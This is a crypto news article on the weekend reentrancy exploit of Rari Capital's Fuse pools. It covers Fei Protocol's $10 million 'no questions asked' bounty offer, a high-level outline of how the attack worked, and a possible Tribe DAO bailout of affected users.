- Smart contract hackers targeted merged DeFi projects Rari Capital and Fei Protocol to steal nearly $80 million over the weekend
- Rather than seeking VC funding to make up for losses, the Tribe DAO, which handles their governance, can vote to make users whole
Crypto platform Fei Protocol hopes a “no questions asked” $10 million bounty will spur hackers to return nearly $80 million in digital assets stolen over the weekend.
Fei, the stablecoin issuer that merged with crypto lending startup Rari Capital just five months ago, made the advocacy on Twitter hours after the exploit – in which hackers infiltrated the platform’s lending pools – was detected on Saturday.
“We are aware of an exploit on various Rari Fuse pools. We have identified the root cause and suspended all borrowing to mitigate further damage,” Fei Protocol tweeted. “To the exploiter, please accept a [$10 million] bonus and no questions asked if you return remaining user funds.
Rari’s hacker exploited a critical “reentrancy” bug buried deep in the protocol code. These bugs involve smart contracts being called to move funds without proper checks.
For its codebase, Fei forked (read: copied) the Ethereum Compound money market platform in early 2021. Compound enables crypto lending by valuing digital assets. It automatically determines borrowing limits and assesses market conditions to calculate interest.
Fei made some changes to the code, however, despite the audits, the flaw wasn’t discovered until too late.
Compound forks have suffered similar fates in the past. Rari even paid $2 million to security researchers who discovered an almost identical flaw in March.
Decentralized exchange Uniswap, DeFi platform Cream Finance, and The Dao, among other projects, fell victim to reentrancy attacks dating back to 2016.
Rari also lost $11 million to smart contract hackers in a freelance attack last May, roughly 60% of the protocol’s equity.
In this case, the Rari Fuse lending pools (which facilitate the lending of related ERC-20 tokens) effectively failed to track the amount of borrowed cryptocurrency.
The setup illegitimately allowed large amounts of cryptocurrency to be borrowed, loan collateral removed, and borrowed funds to be held, according to smart contract auditor CertiK.
Hackers loaned $150 million worth of USDC stablecoin and 50,000 WETH ($141.5 million) to fund more crypto loans from seven Rari Fuse pools.
After triggering a buggy “exitMarket” smart contract function, they withdrew the collateral, repaid the flash loan, and kept the “borrowed” funds from Rari Fuse. The hackers repeated this process until they amassed around $80 million worth of crypto.
Rari Capital later disclosed Another 100 ETH had been hacked on Sunday from a Fuse pool on the layer-2 Ethereum platform Arbitrum.
BlockSec CTO Lei Wu confirmed to Blockworks that 5,400 ETH from the stolen stash was sent to crypto mixer Tornado Cash.
The stolen funds basically belong to Rari Fuse users who had lent their crypto. With that in mind, Fei Protocol isn’t exactly the victim – despite the exploit targeting its source code.
Rari developer Jack Longarzo told Blockworks that Rari’s Fuse platform and the Tribe DAO that handles Fei and Rari’s governance are the real victims. In fact, Tribe DAO may deliberate to release funds from its treasury to make Rari Fuse users whole. Its cash is currently worth $104 million, according to OpenOrgs.
While there is no formal bailout proposal yet (and Longarzo wouldn’t say if one was in the works), such a move would stand in stark contrast to VC-funded bailouts of other beleaguered DeFi platforms such as Wormhole. and Ronin, which generally involved more centralized and private decision-making than a community vote.
But there are indications that Tribe DAO participants may be losing faith. The DAO’s native token, TRIBE, is down 20% since the attack was first revealed.
Get the top crypto news and insights of the day delivered to your inbox each evening. Subscribe to Blockworks’ free newsletter now.